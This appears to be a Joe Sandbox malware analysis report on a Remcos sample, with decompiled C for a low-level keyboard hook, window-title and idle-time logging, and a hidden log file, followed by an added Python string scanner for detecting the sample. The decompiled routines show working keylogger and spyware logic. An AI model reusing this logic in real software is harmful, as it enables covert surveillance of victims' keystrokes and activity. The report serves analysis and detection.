                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,0046E278,00404C7F,00000000,00000000,00000000,?,0046E278,R@), ref: 00404E96
                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,0046E278,00404C7F,00000000,00000000,00000000,?,0046E278,R@), ref: 00404E9B
                                                                      • SetEvent.KERNEL32(00000000,?,00000000,0046E278,00404C7F,00000000,00000000,00000000,?,0046E278,R@), ref: 00404EA8
                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,0046E278,00404C7F,00000000,00000000,00000000,?,0046E278,R@), ref: 00404EAD
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseEvent$HandleObjectSingleWait$ChangeFindNotificationclosesocket
                                                                      • String ID:
                                                                      • API String ID: 2403171778-0
                                                                      • Opcode ID: 0295a8338913ef8802205e3f9f6b61c865046404e0355dd36bdd1f347f13266f
                                                                      • Instruction ID: 5d72978d93b020a25bf4dcb913a2cdf37b769b979e949170859b26b21b6a485d
                                                                      • Opcode Fuzzy Hash: 0295a8338913ef8802205e3f9f6b61c865046404e0355dd36bdd1f347f13266f
                                                                      • Instruction Fuzzy Hash: 2F213A71000B10AFDB216B26DC09B17BBE1EF8032AF104A2DF1A215AF1CB75E851DB98
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      C-Code - Quality: 89%
                                                                      			E00409361(void* __ecx, void* __edx) {
                                                                      				char _v28;
                                                                      				char _v56;
                                                                      				char _v76;
                                                                      				char _v80;
                                                                      				char _v100;
                                                                      				void* _v104;
                                                                      				char _v108;
                                                                      				char _v112;
                                                                      				struct HWND__* _v116;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __ebp;
                                                                      				struct HWND__* _t35;
                                                                      				int _t36;
                                                                      				struct HWND__* _t42;
                                                                      				void* _t50;
                                                                      				int _t57;
                                                                      				struct HWND__* _t77;
                                                                      				void* _t119;
                                                                      				void* _t125;
                                                                      				signed int _t126;
                                                                      				void* _t128;
                                                                      
                                                                      				_t112 = __edx;
                                                                      				_t128 = (_t126 & 0xfffffff8) - 0x74;
                                                                      				_push(_t77);
                                                                      				_push(0xea60);
                                                                      				_t119 = __ecx;
                                                                      				while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
                                                                      					Sleep(0x1f4); // executed
                                                                      					_t35 = GetForegroundWindow(); // executed
                                                                      					_t77 = _t35;
                                                                      					_t36 = GetWindowTextLengthW(_t77);
                                                                      					_t4 = _t36 + 1; // 0x1
                                                                      					E00409FA7(_t77,  &_v100, _t112, _t119, _t125, _t4, 0);
                                                                      					if(_t36 != 0) {
                                                                      						_t57 = E0040243C();
                                                                      						GetWindowTextW(_t77, E00401EC4( &_v100), _t57);
                                                                      						_t112 = 0x46ff6c;
                                                                      						if(E0040A060(0x46ff6c) == 0) {
                                                                      							E00409F8F(0x46ff6c,  &_v100);
                                                                      							E00407727(E0040243C() - 1);
                                                                      							_t128 = _t128 - 0x18;
                                                                      							_t137 =  *0x46e3f3;
                                                                      							if( *0x46e3f3 == 0) {
                                                                      								_t112 = E0040A01F( &_v76, L"\r\n[", _t125,  &_v108);
                                                                      								E00402FD4(_t77, _t128, _t67, _t119, _t125, __eflags, L"]\r\n");
                                                                      								E00408D60(_t119);
                                                                      								E00401EC9();
                                                                      							} else {
                                                                      								E0040773A(_t77, _t128, 0x46ff6c, _t137,  &_v108);
                                                                      								E004097F2(_t77, _t119, _t137);
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					_t83 = _t119;
                                                                      					E00409DD6(_t119);
                                                                      					if(E00418281(_t119) < 0xea60) {
                                                                      						L18:
                                                                      						E00401EC9();
                                                                      						continue;
                                                                      					} else {
                                                                      						_t77 = _v116;
                                                                      						while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
                                                                      							_t42 = E00418281(_t83);
                                                                      							if(_t42 < 0xea60) {
                                                                      								__eflags = _t77 % 0xea60;
                                                                      								E0043DDD1(_t83, _t77 / 0xea60,  &_v112, 0xa);
                                                                      								_t50 = E0040793B(_t77,  &_v80, E004052D4(_t77,  &_v56, "\r\n{ User has been idle for ", _t125, __eflags, E00402053(_t77,  &_v28, _t77 % 0xea60, _t125,  &_v112)), _t119, _t125, __eflags, " minutes }\r\n");
                                                                      								_t128 = _t128 + 0xc - 0x14;
                                                                      								_t112 = _t50;
                                                                      								E00418385(_t128, _t50);
                                                                      								E00408D60(_t119);
                                                                      								E00401F98();
                                                                      								E00401F98();
                                                                      								E00401F98();
                                                                      								goto L18;
                                                                      							}
                                                                      							_t77 = _t42;
                                                                      							_v116 = _t77;
                                                                      							Sleep(0x3e8);
                                                                      						}
                                                                      						E00401EC9();
                                                                      						break;
                                                                      					}
                                                                      				}
                                                                      				__eflags = 0;
                                                                      				return 0;
                                                                      			}

                                                                      0x00409361
                                                                      0x00409367
                                                                      0x0040936a
                                                                      0x0040936b
                                                                      0x0040936d
                                                                      0x0040936f
                                                                      0x004093ce
                                                                      0x004093d4
                                                                      0x004093da
                                                                      0x004093dd
                                                                      0x004093e7
                                                                      0x004093ef
                                                                      0x004093f6
                                                                      0x00409400
                                                                      0x00409411
                                                                      0x00409417
                                                                      0x00409427
                                                                      0x00409433
                                                                      0x00409447
                                                                      0x0040944c
                                                                      0x00409453
                                                                      0x0040945a
                                                                      0x00409484
                                                                      0x00409488
                                                                      0x00409490
                                                                      0x00409499
                                                                      0x0040945c
                                                                      0x0040945f
                                                                      0x00409466
                                                                      0x00409466
                                                                      0x0040945a
                                                                      0x00409427
                                                                      0x0040949e
                                                                      0x004094a0
                                                                      0x004094b1
                                                                      0x00409559
                                                                      0x0040955d
                                                                      0x00000000
                                                                      0x004094b7
                                                                      0x004094b7
                                                                      0x004094bb
                                                                      0x004094cb
                                                                      0x004094d2
                                                                      0x004094f2
                                                                      0x004094f5
                                                                      0x00409526
                                                                      0x0040952b
                                                                      0x0040952e
                                                                      0x00409532
                                                                      0x00409539
                                                                      0x00409542
                                                                      0x0040954b
                                                                      0x00409554
                                                                      0x00000000
                                                                      0x00409554
                                                                      0x004094d4
                                                                      0x004094db
                                                                      0x004094df
                                                                      0x004094df
                                                                      0x0040956b
                                                                      0x00000000
                                                                      0x0040956b
                                                                      0x004094b1
                                                                      0x00409572
                                                                      0x00409578

                                                                      APIs
                                                                      • __Init_thread_footer.LIBCMT ref: 004093C3
                                                                      • Sleep.KERNELBASE(000001F4), ref: 004093CE
                                                                      • GetForegroundWindow.USER32 ref: 004093D4
                                                                      • GetWindowTextLengthW.USER32(00000000), ref: 004093DD
                                                                      • GetWindowTextW.USER32 ref: 00409411
                                                                      • Sleep.KERNEL32(000003E8), ref: 004094DF
                                                                        • Part of subcall function 00408D60: SetEvent.KERNEL32(?,?,?,00409EBD,?,?,?,?,?,00000000), ref: 00408D8C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                      • String ID: [${ User has been idle for $ minutes }$]
                                                                      • API String ID: 911427763-3954389425
                                                                      • Opcode ID: e239597757f8afaf23ce4b67698eaa7f699650f6c7a6796878c1ff69424883ef
                                                                      • Instruction ID: 84067fbe4e5e7cfc0d65f044a5cd870ffbd1248faa41864e0f65aeb095895f00
                                                                      • Opcode Fuzzy Hash: e239597757f8afaf23ce4b67698eaa7f699650f6c7a6796878c1ff69424883ef
                                                                      • Instruction Fuzzy Hash: 1A51AF716082405BC714FB21D856A6FB7A5AF89308F44053FF882A22E3EF7C9D45C69B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1037 41905e-419083 call 401f46 1040 419089 1037->1040 1041 41919e-4191c4 call 401ec4 GetLongPathNameW call 40413e 1037->1041 1043 419090-419095 1040->1043 1044 419182-419187 1040->1044 1045 4190c5-4190ca 1040->1045 1046 419189 1040->1046 1047 4190bb-4190c0 1040->1047 1048 41917b-419180 1040->1048 1049 41909a-4190a8 call 417dc7 call 401ed3 1040->1049 1050 4190cf-4190d6 call 4186b9 1040->1050 1060 4191c9-419236 call 40413e call 41945e call 402f65 * 2 call 401ec9 * 5 1041->1060 1052 41918e call 438a0f 1043->1052 1044->1052 1045->1052 1046->1052 1047->1052 1048->1052 1064 4190ad 1049->1064 1061 4190d8-419128 call 40413e call 438a0f call 40413e call 402f65 call 401ed3 call 401ec9 * 2 1050->1061 1062 41912a-419176 call 40413e call 438a0f call 40413e call 402f65 call 401ed3 call 401ec9 * 2 1050->1062 1063 419193-419199 call 409f8a 1052->1063 1069 4190b1-4190b6 call 401ec9 1061->1069 1062->1064 1063->1041 1064->1069 1069->1041
                                                                      C-Code - Quality: 85%
                                                                      			E0041905E(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                      				char _v524;
                                                                      				char _v544;
                                                                      				char _v560;
                                                                      				char _v572;
                                                                      				void* _v576;
                                                                      				char _v580;
                                                                      				char _v584;
                                                                      				char _v600;
                                                                      				char _v608;
                                                                      				char _v616;
                                                                      				char _v620;
                                                                      				void* _v624;
                                                                      				char _v628;
                                                                      				char _v632;
                                                                      				char _v636;
                                                                      				char _v644;
                                                                      				void* _v648;
                                                                      				char _v652;
                                                                      				void* _v672;
                                                                      				void* __ebx;
                                                                      				void* __ebp;
                                                                      				signed int _t36;
                                                                      				void* _t39;
                                                                      				void* _t40;
                                                                      				void* _t77;
                                                                      				void* _t82;
                                                                      
                                                                      				_t73 = __edx;
                                                                      				_t77 = __ecx;
                                                                      				_t54 = __edx;
                                                                      				E00401F46(__edx,  &_v644);
                                                                      				_t36 = __edx + 0xffffffd0;
                                                                      				_t86 = _t36 - 7;
                                                                      				if(_t36 <= 7) {
                                                                      					switch( *((intOrPtr*)(_t36 * 4 +  &M0041923A))) {
                                                                      						case 0:
                                                                      							_push(L"Temp");
                                                                      							goto L14;
                                                                      						case 1:
                                                                      							__ecx =  &_v620;
                                                                      							__eax = E00417DC7(__ebx,  &_v620, __edx);
                                                                      							__ecx =  &_v644;
                                                                      							__eax = E00401ED3( &_v644, __edx, __esi, __eax);
                                                                      							goto L4;
                                                                      						case 2:
                                                                      							_push(L"SystemDrive");
                                                                      							goto L14;
                                                                      						case 3:
                                                                      							_push(L"WinDir");
                                                                      							goto L14;
                                                                      						case 4:
                                                                      							__eax = E004186B9(__ecx);
                                                                      							__eflags = __al;
                                                                      							if(__eflags != 0) {
                                                                      								__ecx =  &_v620;
                                                                      								E0040413E(__ebx, __ecx, __edx, __ebp, L"\\SysWOW64") = E00438A0F(__ebx, __ecx, __eflags, L"WinDir");
                                                                      								__ecx =  &_v600;
                                                                      								__edx = __eax;
                                                                      								__ecx =  &_v580;
                                                                      								__eax = E00402F65( &_v580, __edx, __eax);
                                                                      								__ecx =  &_v652;
                                                                      								__eax = E00401ED3( &_v652, __edx, __esi, __eax);
                                                                      								__ecx =  &_v584;
                                                                      								__eax = E00401EC9();
                                                                      								__ecx =  &_v608;
                                                                      								__eax = E00401EC9();
                                                                      								L4:
                                                                      								__ecx =  &_v620;
                                                                      								goto L5;
                                                                      							} else {
                                                                      								__ecx =  &_v572;
                                                                      								E0040413E(__ebx, __ecx, __edx, __ebp, L"\\system32") = E00438A0F(__ebx, __ecx, __eflags, L"WinDir");
                                                                      								__ecx =  &_v600;
                                                                      								__edx = __eax;
                                                                      								__ecx =  &_v628;
                                                                      								__eax = E00402F65( &_v628, __edx, __eax);
                                                                      								__ecx =  &_v652;
                                                                      								__eax = E00401ED3( &_v652, __edx, __esi, __eax);
                                                                      								__ecx =  &_v632;
                                                                      								__eax = E00401EC9();
                                                                      								__ecx =  &_v608;
                                                                      								__eax = E00401EC9();
                                                                      								__ecx =  &_v584;
                                                                      								L5:
                                                                      								__eax = E00401EC9();
                                                                      								goto L15;
                                                                      							}
                                                                      							L16:
                                                                      						case 5:
                                                                      							_push(L"ProgramFiles");
                                                                      							goto L14;
                                                                      						case 6:
                                                                      							_push(L"AppData");
                                                                      							goto L14;
                                                                      						case 7:
                                                                      							_push(L"UserProfile"); // executed
                                                                      							L14:
                                                                      							_t51 = E00438A0F(_t54, _t57, _t86); // executed
                                                                      							L00409F8A(_t54,  &_v644, _t73, _t51);
                                                                      							goto L15;
                                                                      					}
                                                                      				}
                                                                      				L15:
                                                                      				__imp__GetLongPathNameW(E00401EC4( &_v644),  &_v524, 0x208); // executed
                                                                      				_t39 = E0040413E(_t54,  &_v560, _t73, _t82, _a4);
                                                                      				_t40 = E0040413E(_t54,  &_v636, _t73, _t82, "\\");
                                                                      				E00402F65(_t77, E00402F65( &_v600, E0041945E(_t54,  &_v616, _t73, _t82, _t86,  &_v544, _t38), _t40), _t39);
                                                                      				E00401EC9();
                                                                      				E00401EC9();
                                                                      				E00401EC9();
                                                                      				E00401EC9();
                                                                      				E00401EC9();
                                                                      				return _t77;
                                                                      				goto L16;
                                                                      			}

                                                                      0x0041905e
                                                                      0x0041906d
                                                                      0x0041906f
                                                                      Instruction addresses for the listing above (column continued; C lines without an address omitted):
                                                                      0x00419075 0x0041907d 0x00419080 0x00419083 0x00419089 0x00419090 0x0041909a 0x0041909e
                                                                      0x004190a4 0x004190a8 0x004190bb 0x004190c5 0x004190cf 0x004190d4 0x004190d6 0x0041912f
                                                                      0x0041913e 0x00419145 0x0041914e 0x00419150 0x00419154 0x0041915b 0x0041915f 0x00419164
                                                                      0x00419168 0x0041916d 0x00419171 0x004190ad 0x004190ad 0x004190d8 0x004190dd 0x004190ec
                                                                      0x004190f3 0x004190fc 0x004190fe 0x00419102 0x00419109 0x0041910d 0x00419112 0x00419116
                                                                      0x0041911b 0x0041911f 0x00419124 0x004190b1 0x004190b1 0x004190b1 0x0041917b 0x00419182
                                                                      0x00419189 0x0041918e 0x0041918e 0x00419199 0x00419089 0x0041919e 0x004191b5 0x004191c4
                                                                      0x004191d3 0x004191fb 0x00419205 0x0041920e 0x00419217 0x00419220 0x00419229 0x00419236

                                                                      APIs
                                                                      • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 004191B5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LongNamePath
                                                                      • String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                      • API String ID: 82841172-1609423294
                                                                      • Opcode ID: a20092cf446a1e024e852ecdcfb79795042d4ca980e1efba7e91b68b2337585c
                                                                      • Instruction ID: 9e4c647ec7685b194a43107814288911539900394b17977f9ebe9b62d2eba58c
                                                                      • Opcode Fuzzy Hash: a20092cf446a1e024e852ecdcfb79795042d4ca980e1efba7e91b68b2337585c
                                                                      • Instruction Fuzzy Hash: 0841677211C3456AC204FB21DC56CEFB3A8AE9531DF10053FF442620E2EE786D8AC65B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Basic blocks (id: address range, calls):
                                                                      • 1115: 408a72-408a89
                                                                      • 1116: 408a8b-408aa5 GetModuleHandleA, SetWindowsHookExA
                                                                      • 1117: 408aed-408afd KiUserCallbackDispatcher
                                                                      • 1118: 408b19
                                                                      • 1119: 408aff-408b17 TranslateMessage, DispatchMessageA
                                                                      • 1120: 408aa7-408aeb GetLastError, call 4182d1, call 4052d4, call 402053, call 417d02, call 401f98
                                                                      • 1121: 408b1b-408b20
                                                                      Edges: 1115->1116, 1115->1117, 1116->1117, 1116->1120, 1117->1118, 1117->1119, 1118->1121, 1119->1117, 1119->1118, 1120->1121
                                                                      C-Code - Quality: 91%
                                                                      			E00408A72(struct HHOOK__** __ecx) {
                                                                      				struct tagMSG _v32;
                                                                      				char _v60;
                                                                      				void* _v64;
                                                                      				void* __edi;
                                                                      				void* __ebp;
                                                                      				struct HHOOK__* _t7;
                                                                      				void* _t8;
                                                                      				struct HHOOK__* _t14;
                                                                      				void* _t16;
                                                                      				void* _t22;
                                                                      				struct HHOOK__** _t34;
                                                                      				void* _t36;
                                                                      				signed int _t37;
                                                                      				void* _t39;
                                                                      
                                                                      				_t39 = (_t37 & 0xfffffff8) - 0x38; // 0x00408a78
                                                                      				_t34 = __ecx; // 0x00408a7c
                                                                      				 *0x46dae8 = __ecx; // 0x00408a81, global copy of the pointer to the HHOOK slot
                                                                      				if( *((intOrPtr*)(__ecx)) != 0) { // 0x00408a89, hook already installed: go straight to the message pump
                                                                      					goto L3;
                                                                      				} else {
                                                                      					// 0xd == WH_KEYBOARD_LL: low-level keyboard hook, callback E00408A5E, hMod = this module, dwThreadId 0 = all threads on the desktop
                                                                      					_t14 = SetWindowsHookExA(0xd, E00408A5E, GetModuleHandleA(0), 0); // executed, 0x00408a9b
                                                                      					 *_t34 = _t14; // 0x00408aa1
                                                                      					_t44 = _t14; // 0x00408aa3
                                                                      					if(_t14 != 0) { // 0x00408aa5
                                                                      						while(1) { // 0x00408aed
                                                                      							L3: // 0x00408aed
                                                                      							// Message pump: a WH_KEYBOARD_LL callback is only delivered while the installing thread processes messages.
                                                                      							// This GetMessageA call is what the APIs list below records as KiUserCallbackDispatcher at 00408AF5.
                                                                      							_t7 = GetMessageA( &_v32, 0, 0, 0); // executed, 0x00408af5
                                                                      							__eflags = _t7; // 0x00408afb
                                                                      							if(_t7 == 0) { // 0x00408afd
                                                                      								break;
                                                                      							}
                                                                      							TranslateMessage( &_v32); // 0x00408b04
                                                                      							DispatchMessageA( &_v32); // 0x00408b0f
                                                                      							__eflags =  *_t34; // 0x00408b15
                                                                      							if( *_t34 != 0) { // 0x00408b17, keep pumping until the HHOOK slot is cleared
                                                                      								continue;
                                                                      							}
                                                                      							break;
                                                                      						} // 0x00408b17
                                                                      						_t8 = 0; // 0x00408b19, normal exit returns 0
                                                                      						__eflags = 0; // 0x00408b19
                                                                      					} else { // 0x00408aa7
                                                                      						// Hook failed: append GetLastError() to "Keylogger initialization failure: error " and log it
                                                                      						// (E00417D02 stamps it with GetLocalTime, see the APIs list below).
                                                                      						_t16 = E004182D1(_t22,  &_v60, GetLastError()); // 0x00408ab3
                                                                      						_t40 = _t39 - 0x18; // 0x00408ab8
                                                                      						E004052D4(_t22, _t39 - 0x18, "Keylogger initialization failure: error ", _t36, _t44, _t16); // 0x00408ac3
                                                                      						E00402053(_t22, _t40 - 0x14, "Keylogger initialization failure: error ", _t36, "E"); // 0x00408ad2
                                                                      						E00417D02(_t22, 0); // 0x00408ad7
                                                                      						E00401F98(); // 0x00408ae3
                                                                      						_t8 = 1; // 0x00408aea, failure returns 1
                                                                      					} // 0x00408aea
                                                                      				} // 0x00408aa5
                                                                      				return _t8; // 0x00408b20
                                                                      			}

                                                                      APIs
                                                                      • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00408A8D
                                                                      • SetWindowsHookExA.USER32 ref: 00408A9B
                                                                      • GetLastError.KERNEL32 ref: 00408AA7
                                                                        • Part of subcall function 00417D02: GetLocalTime.KERNEL32(00000000), ref: 00417D1C
                                                                      • KiUserCallbackDispatcher.NTDLL ref: 00408AF5
                                                                      • TranslateMessage.USER32(?), ref: 00408B04
                                                                      • DispatchMessageA.USER32 ref: 00408B0F
                                                                      Strings
                                                                      • Keylogger initialization failure: error , xrefs: 00408ABB
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Message$CallbackDispatchDispatcherErrorHandleHookLastLocalModuleTimeTranslateUserWindows
                                                                      • String ID: Keylogger initialization failure: error
                                                                      • API String ID: 941179788-952744263
                                                                      • Opcode ID: 80e9c3719d5138d5a7aeeeff26dddd61ebee18b289506c455043542e035c4785
                                                                      • Instruction ID: 09a998a08c51662740e195c7b0c037219e3fb6e082e02c56b64d3784da25797e
                                                                      • Opcode Fuzzy Hash: 80e9c3719d5138d5a7aeeeff26dddd61ebee18b289506c455043542e035c4785
                                                                      • Instruction Fuzzy Hash: EC11EF317003016BCB00BBB69D0986B77FCEBD1719B50097FB881D25A1EE34C540CB6A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%
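The two routines above expose strings that identify this Remcos build in memory: the environment-variable names listed in the String ID of the GetLongPathNameW caller (AppData, ProgramFiles, SystemDrive, Temp, UserProfile, WinDir, \SysWOW64, \system32) and "Keylogger initialization failure: error " from E00408A72. The following is an added example, not part of the Joe Sandbox report and not the sample's own code: a YARA-style scan in Python that matches each string as ASCII and as UTF-16LE and only fires when several distinct strings co-occur, so a generic name like "Temp" cannot trigger it alone. The `Rule`/`scan` names, the `required=4` threshold and the dump bytes in `build_sample_dump()` are my choices, not data from the sample.

```python
"""Apply the report's Remcos string indicators to a memory dump.

Added example (not part of the Joe Sandbox report and not the sample's code):
a YARA-style scan over raw bytes, matching each string as ASCII and as UTF-16LE
("wide") and requiring a minimum number of distinct strings to fire.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Indicator strings copied from the report: the String ID of the
# GetLongPathNameW caller (entries separated by '$') and of E00408A72.
ENV_NAMES = ["AppData", "ProgramFiles", "SystemDrive", "Temp",
             "UserProfile", "WinDir", "\\SysWOW64", "\\system32"]
KEYLOG_ERR = "Keylogger initialization failure: error "


@dataclass
class Rule:
    name: str
    strings: Dict[str, str]   # identifier -> text
    required: int             # distinct identifiers needed for a match
    wide: bool = True         # also search UTF-16LE encodings


@dataclass
class Match:
    rule: str
    hits: Dict[str, List[Tuple[int, str]]] = field(default_factory=dict)

    @property
    def matched(self) -> int:
        return len(self.hits)


def _patterns(text: str, wide: bool):
    yield "ascii", re.compile(re.escape(text.encode("ascii")))
    if wide:
        yield "wide", re.compile(re.escape(text.encode("utf-16-le")))


def scan(buf: bytes, rule: Rule) -> Optional[Match]:
    """Return a Match (identifier -> [(offset, encoding)]) when at least
    rule.required distinct strings occur in buf, else None."""
    m = Match(rule.name)
    for ident, text in rule.strings.items():
        for enc, pat in _patterns(text, rule.wide):
            for hit in pat.finditer(buf):
                m.hits.setdefault(ident, []).append((hit.start(), enc))
    return m if m.matched >= rule.required else None


# Threshold of 4 is my choice: the env-var names alone are common in benign code.
REMCOS_KEYLOG_STRINGS = Rule(
    name="remcos_keylogger_strings",
    strings=dict({s: s for s in ENV_NAMES}, err=KEYLOG_ERR),
    required=4,
)


def build_sample_dump() -> bytes:
    """Constructed stand-in for a process dump; not data from the sample."""
    return (b"\x00" * 16
            + KEYLOG_ERR.encode("ascii")          # offset 16, narrow
            + b"\x00" * 8
            + "WinDir".encode("utf-16-le")        # offset 64, wide
            + b"\x00" * 8
            + b"\\SysWOW64"                        # offset 84, narrow
            + b"\x00" * 8
            + "Temp".encode("utf-16-le")          # offset 101, wide
            + b"\x00" * 32)


if __name__ == "__main__":
    print(scan(build_sample_dump(), REMCOS_KEYLOG_STRINGS))
```

Run it against a dump such as the .sdmp named in the Memory Dump Source entries by passing the file's bytes to `scan()`; the returned offsets let you jump straight to the string references in the disassembly.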

                                                                      Control-flow Graph

                                                                      C-Code - Quality: 96%
                                                                      			E00408E50(void* __ecx, char* __edx) {
                                                                      				char _v1028;
                                                                      				char _v1040;
                                                                      				char _v1064;
                                                                      				char _v1076;
                                                                      				void* _v1080;
                                                                      				void* _v1088;
                                                                      				void* _v1092;
                                                                      				char _v1100;
                                                                      				char _v1124;
                                                                      				void* _v1132;
                                                                      				char _v1136;
                                                                      				void* _v1152;
                                                                      				void* __ebx;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				signed char _t32;
                                                                      				char* _t34;
                                                                      				void* _t36;
                                                                      				int _t40;
                                                                      				void* _t47;
                                                                      				char* _t51;
                                                                      				int _t64;
                                                                      				void* _t66;
                                                                      				void* _t72;
                                                                      				void* _t73;
                                                                      				void* _t81;
                                                                      				void* _t137;
                                                                      				signed int _t139;
                                                                      				signed int _t140;
                                                                      				void* _t141;
                                                                      				void* _t142;
                                                                      				signed int _t143;
                                                                      
                                                                      				_t129 = __edx; // 0x00408e50
                                                                      				_t140 = _t139 & 0xfffffff8; // 0x00408e53
                                                                      				_t143 = _t140; // 0x00408e53
                                                                      				_t141 = _t140 - 0x460; // 0x00408e56
                                                                      				_t81 = __ecx; // 0x00408e5e, object pointer (this)
                                                                      				_push(_t133); // 0x00408e60
                                                                      				_t137 = __ecx + 4; // 0x00408e62
                                                                      				do { // 0x00408e65
                                                                      					Sleep(0x1388); // executed, 0x00408e6a: 5000 ms between flushes
                                                                      					E00408D9F(_t81, _t129); // 0x00408e72
                                                                      					_t129 = 0x4610ec; // 0x00408e77
                                                                      					if(E004078C9(_t143) != 0) { // 0x00408e85
                                                                      						if(E00409F76() == 0) { // 0x00408e97
                                                                      							CreateDirectoryW(E00401EC4(0x46e420), 0); // executed, 0x00408ea6: create the log directory (path string at 0x46e420)
                                                                      						} // 0x00408ea6
                                                                      						_t131 = _t81 + 0x60; // 0x00408eac, log file path held at this+0x60
                                                                      						_t32 = GetFileAttributesW(E00401EC4(_t81 + 0x60)); // executed, 0x00408eb7
                                                                      						_t146 = _t32 & 0x00000002; // 0x00408ebd, 0x2 == FILE_ATTRIBUTE_HIDDEN
                                                                      						if((_t32 & 0x00000002) != 0) { // 0x00408ebf
                                                                      							SetFileAttributesW(E00401EC4(_t131), 0x80); // executed, 0x00408ece: 0x80 == FILE_ATTRIBUTE_NORMAL, un-hide before writing
                                                                      						} // 0x00408ece
                                                                      						_t34 = E00401F6B(E00401E25(0x46e600, _t129, _t137, _t146, 0x12)); // 0x00408ee2, entry 0x12 of the table at 0x46e600
                                                                      						_t147 =  *_t34; // 0x00408ee7
                                                                      						if( *_t34 != 0) { // 0x00408eea
                                                                      							E0040209F(_t81,  &_v1124); // 0x00408f1c
                                                                      							_t36 = E0040243C(); // 0x00408f26
                                                                      							E00405AE8( &_v1028, E00401F6B(0x46e5e8), _t36); // 0x00408f3b
                                                                      							_t40 = PathFileExistsW(E00401EC4(_t131)); // executed, 0x00408f48
                                                                      							__eflags = _t40; // 0x00408f4e
                                                                      							if(_t40 != 0) { // 0x00408f50
                                                                      								E0040209F(_t81,  &_v1100); // 0x00408f56
                                                                      								E00401EC4(_t131); // 0x00408f5d
                                                                      								_t129 =  &_v1100; // 0x00408f62
                                                                      								_t64 = E004189A5( &_v1100); // 0x00408f68
                                                                      								__eflags = _t64; // 0x00408f6d
                                                                      								if(_t64 != 0) { // 0x00408f6f
                                                                      									_t66 = E0040243C(); // 0x00408f75
                                                                      									E00401FA2( &_v1136, _t129, _t133, E00405C09(_t81,  &_v1028,  &_v1100,  &_v1076, E00401F6B( &_v1100), _t66)); // 0x00408f98
                                                                      									E00401F98(); // 0x00408fa1
                                                                      								} // 0x00408fa1
                                                                      								E00401F98(); // 0x00408faa
                                                                      							} // 0x00408faa
                                                                      							_t42 = E0040243C() + _t41; // 0x00408fb6
                                                                      							__eflags = E0040243C() + _t41; // 0x00408fb6
                                                                      							L00403336(E00402077(_t81,  &_v1076, _t129, _t137, __eflags, E00401EC4(_t137), _t42)); // 0x00408fcf
                                                                      							E00401F98(); // 0x00408fd8
                                                                      							_t47 = E0040243C(); // 0x00408fe1
                                                                      							E00405C09(_t81,  &_v1040, _t129,  &_v1064, E00401F6B( &_v1136), _t47); // 0x00408ffa
                                                                      							_t51 = E00401EC4(_t131); // 0x00409001
                                                                      							_t142 = _t141 - 0x18; // 0x00409006
                                                                      							_t133 = _t51; // 0x00409009
                                                                      							E004020B6(_t81, _t142, _t129, __eflags,  &_v1076); // 0x00409012
                                                                      							E00418A12(_t51); // 0x00409019
                                                                      							_t141 = _t142 + 0x18; // 0x0040901e
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      						} else {
                                                                      							_t72 = E00401EC4(_t131);
                                                                      							_t73 = E0040243C();
                                                                      							_t135 = _t73;
                                                                      							_t133 = _t73 + _t135;
                                                                      							E00401EC4(_t137);
                                                                      							_t129 = _t73 + _t135;
                                                                      							E00418911(_t73 + _t135, _t72, 1);
                                                                      						}
                                                                      						L00409F8A(_t81, _t137, _t129, 0x4610ec);
                                                                      						if( *((char*)(E00401F6B(E00401E25(0x46e600, _t129, _t137, _t147, 0x13)))) != 0) { // entry 0x13 of the table at 0x46e600
                                                                      							SetFileAttributesW(E00401EC4(_t131), 6); // executed: 0x2 | 0x4 == FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM, re-hide the log
                                                                      						}
                                                                      					}
                                                                      				} while ( *((char*)(_t81 + 0x49)) != 0); // loop while the flag at this+0x49 is set
                                                                      				return 0;
                                                                      			}
                                                                      0x00409025
                                                                      0x0040902e
                                                                      0x00408eec
                                                                      0x00408ef0
                                                                      0x00408ef8
